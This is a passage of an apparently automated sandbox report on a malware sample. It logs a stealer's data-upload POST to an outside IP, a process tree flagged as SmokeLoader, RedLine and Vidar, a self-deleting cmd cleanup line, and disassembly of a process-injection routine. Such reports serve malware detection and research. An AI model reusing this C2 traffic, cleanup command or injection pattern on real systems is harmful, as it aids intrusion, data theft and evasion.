                                                          2024-05-26 22:28:38 UTC14707OUTData Raw: 65 39 55 32 6b 72 73 6c 4a 79 64 6b 46 64 4e 34 55 38 51 57 65 68 70 64 69 36 53 5a 76 4f 4b 46 66 4b 55 48 70 6e 4f 63 6b 65 74 63 77 47 33 52 6d 52 56 64 6f 78 6e 4c 71 68 4b 6a 41 42 50 4f 4d 63 41 6a 50 31 46 43 45 79 4b 58 6a 53 52 30 43 73 35 5a 55 4a 41 56 63 62 6a 6b 44 6f 4d 6a 50 70 6b 56 7a 34 69 6e 53 72 77 35 4a 79 30 4f 7a 42 31 71 2b 46 71 71 72 54 6a 64 2b 61 5a 36 54 2f 77 6e 32 6b 2f 38 38 62 7a 2f 76 32 76 2f 77 41 56 53 66 38 41 43 66 61 54 2f 77 41 38 4c 33 2f 76 32 76 38 41 38 56 58 6d 32 38 65 56 4a 4b 41 78 6a 6a 58 65 37 4b 70 49 52 63 34 79 63 64 42 6d 6e 50 6d 4f 56 6f 70 45 65 4f 56 53 41 30 62 71 56 59 45 39 4f 44 7a 58 44 2f 5a 57 47 76 62 6d 66 33 72 2f 41 43 50 56 2f 74 2f 47 32 35 75 52 57 39 48 2f 41 4a 6e 6f 2f 77 44 77
                                                          Data Ascii: e9U2krslJydkFdN4U8QWehpdi6SZvOKFfKUHpnOcketcwG3RmRVdoxnLqhKjABPOMcAjP1FCEyKXjSR0Cs5ZUJAVcbjkDoMjPpkVz4inSrw5Jy0OzB1q+FqqrTjd+aZ6T/wn2k/88bz/v2v/wAVSf8ACfaT/wA8L3/v2v8A8VXm28eVJKAxjjXe7KpIRc4ycdBmnPmOVopEeOVSA0bqVYE9ODzXD/ZWGvbmf3r/ACPV/t/G25uRW9H/AJno/wDw
                                                          2024-05-26 22:28:39 UTC158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 26 May 2024 22:28:39 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          2024-05-26 22:28:39 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 2ok0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          31192.168.2.54977265.109.242.594431436C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          TimestampBytes transferredDirectionData
                                                          2024-05-26 22:28:40 UTC278OUTPOST / HTTP/1.1
                                                          Content-Type: multipart/form-data; boundary=----FCBAEHCAEGDHJKFHJKFI
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                          Host: 65.109.242.59
                                                          Content-Length: 331
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          2024-05-26 22:28:40 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 46 43 42 41 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 32 33 66 61 38 35 36 30 33 62 39 36 66 36 35 63 64 64 64 66 39 30 38 62 35 34 33 65 66 39 61 0d 0a 2d 2d 2d 2d 2d 2d 46 43 42 41 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 46 43 42 41 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 49 0d 0a 43 6f 6e 74
                                                          Data Ascii: ------FCBAEHCAEGDHJKFHJKFIContent-Disposition: form-data; name="token"d23fa85603b96f65cdddf908b543ef9a------FCBAEHCAEGDHJKFHJKFIContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------FCBAEHCAEGDHJKFHJKFICont
                                                          2024-05-26 22:28:41 UTC158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 26 May 2024 22:28:41 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          2024-05-26 22:28:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Statistics

                                                          CPU Usage

                                                          Click to jump to process

                                                          Memory Usage

                                                          Click to jump to process

                                                          High Level Behavior Distribution

                                                          Click to dive into process behavior distribution

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Target ID:0
                                                          Start time:18:26:48
                                                          Start date:26/05/2024
                                                          Path:C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe"
                                                          Imagebase:0x400000
                                                          File size:41'369 bytes
                                                          MD5 hash:A93525F5F13C811E90C56492F5AC934A
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2051360690.0000000000160000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2051360690.0000000000160000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2051493658.00000000001D1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2051493658.00000000001D1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:2
                                                          Start time:18:26:53
                                                          Start date:26/05/2024
                                                          Path:C:\Windows\explorer.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Explorer.EXE
                                                          Imagebase:0x7ff674740000
                                                          File size:5'141'208 bytes
                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:false

                                                          General

                                                          Target ID:4
                                                          Start time:18:27:13
                                                          Start date:26/05/2024
                                                          Path:C:\Users\user\AppData\Roaming\aarhevh
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\AppData\Roaming\aarhevh
                                                          Imagebase:0x400000
                                                          File size:41'369 bytes
                                                          MD5 hash:A93525F5F13C811E90C56492F5AC934A
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.2290056275.00000000001E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.2290056275.00000000001E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.2290149216.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.2290149216.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                          Antivirus matches:
                                                          • Detection: 100%, Avira
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 55%, ReversingLabs
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:5
                                                          Start time:18:27:20
                                                          Start date:26/05/2024
                                                          Path:C:\Users\user\AppData\Local\Temp\21AE.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\AppData\Local\Temp\21AE.exe
                                                          Imagebase:0x400000
                                                          File size:325'120 bytes
                                                          MD5 hash:EA9DD1EAE2E521666D3F06382104EC10
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.2691688506.00000000007BD000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                          Antivirus matches:
                                                          • Detection: 100%, Avira
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 92%, ReversingLabs
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:10
                                                          Start time:18:27:41
                                                          Start date:26/05/2024
                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5640 -s 1724
                                                          Imagebase:0x7e0000
                                                          File size:483'680 bytes
                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:12
                                                          Start time:18:27:53
                                                          Start date:26/05/2024
                                                          Path:C:\Users\user\AppData\Local\Temp\C9A7.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\AppData\Local\Temp\C9A7.exe
                                                          Imagebase:0x400000
                                                          File size:2'144'768 bytes
                                                          MD5 hash:5DEB4442AE617600891949163BB52F0A
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:Borland Delphi
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Crypt, Description: Yara detected CryptOne packer, Source: 0000000C.00000002.2640862661.00000000042D9000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000002.2641621333.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation, Description: Detects executables containing potential Windows Defender anti-emulation checks, Source: 0000000C.00000002.2641621333.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000002.2639865641.0000000002590000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation, Description: Detects executables containing potential Windows Defender anti-emulation checks, Source: 0000000C.00000002.2639865641.0000000002590000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000002.2640862661.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000C.00000002.2640862661.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 100%, Joe Sandbox ML
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:13
                                                          Start time:18:27:53
                                                          Start date:26/05/2024
                                                          Path:C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          Imagebase:0x400000
                                                          File size:881'664 bytes
                                                          MD5 hash:66064DBDB70A5EB15EBF3BF65ABA254B
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Antivirus matches:
                                                          • Detection: 4%, ReversingLabs
                                                          Reputation:moderate
                                                          Has exited:true

                                                          General

                                                          Target ID:14
                                                          Start time:18:28:42
                                                          Start date:26/05/2024
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\katA304.tmp" & rd /s /q "C:\ProgramData\GIEHIDHJDBFI" & exit
                                                          Imagebase:0x790000
                                                          File size:236'544 bytes
                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:15
                                                          Start time:18:28:42
                                                          Start date:26/05/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:16
                                                          Start time:18:28:42
                                                          Start date:26/05/2024
                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:timeout /t 10
                                                          Imagebase:0x900000
                                                          File size:25'088 bytes
                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:17
                                                          Start time:18:30:02
                                                          Start date:26/05/2024
                                                          Path:C:\Users\user\AppData\Roaming\aarhevh
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\AppData\Roaming\aarhevh
                                                          Imagebase:0x400000
                                                          File size:41'369 bytes
                                                          MD5 hash:A93525F5F13C811E90C56492F5AC934A
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:false

                                                          Disassembly

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:7%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:53.7%
                                                            Total number of Nodes:67
                                                            Total number of Limit Nodes:3
                                                            execution_graph 2374 402e20 2375 402dd5 2374->2375 2376 402e24 2374->2376 2377 4019e3 15 API calls 2376->2377 2378 402f59 2376->2378 2377->2378 2379 401620 2380 401626 2379->2380 2381 4016c6 NtDuplicateObject 2380->2381 2389 4017e2 2380->2389 2382 4016e3 NtCreateSection 2381->2382 2381->2389 2383 401763 NtCreateSection 2382->2383 2384 401709 NtMapViewOfSection 2382->2384 2385 40178f 2383->2385 2383->2389 2384->2383 2386 40172c NtMapViewOfSection 2384->2386 2387 401799 NtMapViewOfSection 2385->2387 2385->2389 2386->2383 2388 40174a 2386->2388 2387->2389 2390 4017c0 NtMapViewOfSection 2387->2390 2388->2383 2390->2389 2349 402f74 2351 402f7e 2349->2351 2350 4019e3 15 API calls 2352 403029 2350->2352 2351->2350 2351->2352 2360 401a09 2361 401a0e 2360->2361 2362 401a2b Sleep 2361->2362 2363 401524 7 API calls 2362->2363 2364 401a46 2363->2364 2365 401615 7 API calls 2364->2365 2366 401a53 2364->2366 2365->2366 2302 402f9c 2303 402f8f 2302->2303 2305 403029 2303->2305 2306 4019e3 2303->2306 2307 4019f3 2306->2307 2308 401a53 2307->2308 2309 401a2b Sleep 2307->2309 2308->2305 2313 401524 2309->2313 2311 401a46 2311->2308 2325 401615 2311->2325 2314 401533 2313->2314 2314->2311 2315 4017e2 2314->2315 2316 4016c6 NtDuplicateObject 2314->2316 2315->2311 2316->2315 2317 4016e3 NtCreateSection 2316->2317 2318 401763 NtCreateSection 2317->2318 2319 401709 NtMapViewOfSection 2317->2319 2318->2315 2320 40178f 2318->2320 2319->2318 2321 40172c NtMapViewOfSection 2319->2321 2320->2315 2322 401799 NtMapViewOfSection 2320->2322 2321->2318 2324 40174a 2321->2324 2322->2315 2323 4017c0 NtMapViewOfSection 2322->2323 2323->2315 2324->2318 2326 401626 2325->2326 2327 4016c6 NtDuplicateObject 2326->2327 2336 4017e2 2326->2336 2328 4016e3 NtCreateSection 2327->2328 2327->2336 2329 401763 NtCreateSection 2328->2329 2330 401709 NtMapViewOfSection 2328->2330 2331 40178f 2329->2331 2329->2336 2330->2329 2332 40172c NtMapViewOfSection 2330->2332 2333 401799 NtMapViewOfSection 2331->2333 2331->2336 2332->2329 2334 40174a 2332->2334 2335 4017c0 NtMapViewOfSection 2333->2335 2333->2336 2334->2329 2335->2336 2336->2308 2415 4019ee 2416 4019f8 2415->2416 2417 401a2b Sleep 2416->2417 2421 401a53 2416->2421 2418 401524 7 API calls 2417->2418 2419 401a46 2418->2419 2420 401615 7 API calls 2419->2420 2419->2421 2420->2421

                                                            Executed Functions

                                                            Function 00401524 Relevance: 10.7, APIs: 7, Instructions: 248COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 0 401524-401556 7 401563-40156c call 4012a9 0->7 12 401593-40159b 7->12 13 40156e-401580 7->13 16 40159d-4015a0 12->16 14 401582-401589 13->14 15 4015fd-401612 13->15 17 401560 14->17 18 40158b-40158d 14->18 21 401639-40165a 15->21 19 4015a2-4015a4 16->19 20 4015e9-4015ef 16->20 17->7 22 401590-401592 18->22 23 4015a6-4015c7 19->23 24 4015f7 19->24 20->24 30 40165d-401670 call 4012a9 21->30 31 40164e-401656 21->31 22->12 26 401643 23->26 27 4015c9 23->27 24->15 26->21 27->22 29 4015cb 27->29 29->16 32 4015cd 29->32 35 401672 30->35 36 401675-40167a 30->36 31->30 32->20 35->36 38 401680-401691 36->38 39 401991-401999 36->39 42 401697-4016c0 38->42 43 40198f-4019e0 call 4012a9 38->43 39->36 42->43 51 4016c6-4016dd NtDuplicateObject 42->51 51->43 52 4016e3-401707 NtCreateSection 51->52 55 401763-401789 NtCreateSection 52->55 56 401709-40172a NtMapViewOfSection 52->56 55->43 57 40178f-401793 55->57 56->55 59 40172c-401748 NtMapViewOfSection 56->59 57->43 60 401799-4017ba NtMapViewOfSection 57->60 59->55 61 40174a-401760 59->61 60->43 63 4017c0-4017dc NtMapViewOfSection 60->63 61->55 63->43 65 4017e2 call 4017e7 63->65
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2051577511.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2051530690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2051608734.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2051664638.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ec0589a186aaf54ab9e34ef1409c0e3bd6669b76e0db207e0b32d8ee79fde39b
                                                            • Instruction ID: 3423bc01ac4f23736aca193bd8ce0b677c435782841011dc968e413a06447a3e
                                                            • Opcode Fuzzy Hash: ec0589a186aaf54ab9e34ef1409c0e3bd6669b76e0db207e0b32d8ee79fde39b
                                                            • Instruction Fuzzy Hash: 4781CFB1500208BFDB209FA1DC89FABBFB8FF85710F10002AF952BA1E0D6759945CB65
                                                            Function 00401615 Relevance: 10.7, APIs: 7, Instructions: 204nativeCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 70 401615-40165a 78 40165d-401670 call 4012a9 70->78 79 40164e-401656 70->79 82 401672 78->82 83 401675-40167a 78->83 79->78 82->83 85 401680-401691 83->85 86 401991-401999 83->86 89 401697-4016c0 85->89 90 40198f-4019e0 call 4012a9 85->90 86->83 89->90 98 4016c6-4016dd NtDuplicateObject 89->98 98->90 99 4016e3-401707 NtCreateSection 98->99 102 401763-401789 NtCreateSection 99->102 103 401709-40172a NtMapViewOfSection 99->103 102->90 104 40178f-401793 102->104 103->102 106 40172c-401748 NtMapViewOfSection 103->106 104->90 107 401799-4017ba NtMapViewOfSection 104->107 106->102 108 40174a-401760 106->108 107->90 110 4017c0-4017dc NtMapViewOfSection 107->110 108->102 110->90 112 4017e2 call 4017e7 110->112
                                                            APIs
                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401743
                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401784
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B5
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2051577511.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2051530690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2051608734.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2051664638.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.jbxd
                                                            Similarity
                                                            • API ID: Section$View$Create$DuplicateObject
                                                            • String ID:
                                                            • API String ID: 1546783058-0
                                                            • Opcode ID: 51aea8e4bab5c1fcf6e4467ccf11cb59c1a8cda3da8b4103b7978e3a0cf5edd1
                                                            • Instruction ID: a4a30113af8e0dba67415144994249baddb0a1b9eea12a3ecfbdd2b7a77b6b5b
                                                            • Opcode Fuzzy Hash: 51aea8e4bab5c1fcf6e4467ccf11cb59c1a8cda3da8b4103b7978e3a0cf5edd1
                                                            • Instruction Fuzzy Hash: B16160B0A04204FBEB209F95CC59FAFBBB9FF85700F14012AF912BA1E4D6759941CB65
                                                            Function 00401635 Relevance: 10.7, APIs: 7, Instructions: 178nativeCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 117 401635-40165a 121 40165d-401670 call 4012a9 117->121 122 40164e-401656 117->122 125 401672 121->125 126 401675-40167a 121->126 122->121 125->126 128 401680-401691 126->128 129 401991-401999 126->129 132 401697-4016c0 128->132 133 40198f-4019e0 call 4012a9 128->133 129->126 132->133 141 4016c6-4016dd NtDuplicateObject 132->141 141->133 142 4016e3-401707 NtCreateSection 141->142 145 401763-401789 NtCreateSection 142->145 146 401709-40172a NtMapViewOfSection 142->146 145->133 147 40178f-401793 145->147 146->145 149 40172c-401748 NtMapViewOfSection 146->149 147->133 150 401799-4017ba NtMapViewOfSection 147->150 149->145 151 40174a-401760 149->151 150->133 153 4017c0-4017dc NtMapViewOfSection 150->153 151->145 153->133 155 4017e2 call 4017e7 153->155
                                                            APIs
                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2051577511.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2051530690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2051608734.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2051664638.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.jbxd
                                                            Similarity
                                                            • API ID: Section$CreateDuplicateObjectView
                                                            • String ID:
                                                            • API String ID: 1652636561-0
                                                            • Opcode ID: 65273b328aa836d1c8ef135f831071b3c0bd7089d9bb5908dabae89f1d3e14fc
                                                            • Instruction ID: 3fb00a2a449b0bf69def1bd66bbf1e23b36e7d6b3741b7ef4c3438294d77159f
                                                            • Opcode Fuzzy Hash: 65273b328aa836d1c8ef135f831071b3c0bd7089d9bb5908dabae89f1d3e14fc
                                                            • Instruction Fuzzy Hash: 48514BB1900245BFEB208F91CC49FABBBB9FF85B10F140169F911BA2E5D6759941CB24
                                                            Function 0040162D Relevance: 10.7, APIs: 7, Instructions: 174nativeCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 160 40162d-40165a 166 40165d-401670 call 4012a9 160->166 167 40164e-401656 160->167 170 401672 166->170 171 401675-40167a 166->171 167->166 170->171 173 401680-401691 171->173 174 401991-401999 171->174 177 401697-4016c0 173->177 178 40198f-4019e0 call 4012a9 173->178 174->171 177->178 186 4016c6-4016dd NtDuplicateObject 177->186 186->178 187 4016e3-401707 NtCreateSection 186->187 190 401763-401789 NtCreateSection 187->190 191 401709-40172a NtMapViewOfSection 187->191 190->178 192 40178f-401793 190->192 191->190 194 40172c-401748 NtMapViewOfSection 191->194 192->178 195 401799-4017ba NtMapViewOfSection 192->195 194->190 196 40174a-401760 194->196 195->178 198 4017c0-4017dc NtMapViewOfSection 195->198 196->190 198->178 200 4017e2 call 4017e7 198->200
                                                            APIs
                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401743
                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401784
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B5
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2051577511.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2051530690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2051608734.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2051664638.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.jbxd
                                                            Similarity
                                                            • API ID: Section$View$Create$DuplicateObject
                                                            • String ID:
                                                            • API String ID: 1546783058-0
                                                            • Opcode ID: 7cce7ca2c81922fdd57f436713529b55977ba2092893eab35f95f5ad939aedda
                                                            • Instruction ID: aa686160c5e479dc60cd3c6abf7d34016e244b0820b9c6a6449991f1b23776f6
                                                            • Opcode Fuzzy Hash: 7cce7ca2c81922fdd57f436713529b55977ba2092893eab35f95f5ad939aedda
                                                            • Instruction Fuzzy Hash: F1513BB1900209BFEB208F91CC48FAFBBB8FF85B10F140129F911BA2E5D6759945CB24
                                                            Function 00401620 Relevance: 10.7, APIs: 7, Instructions: 173nativeCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
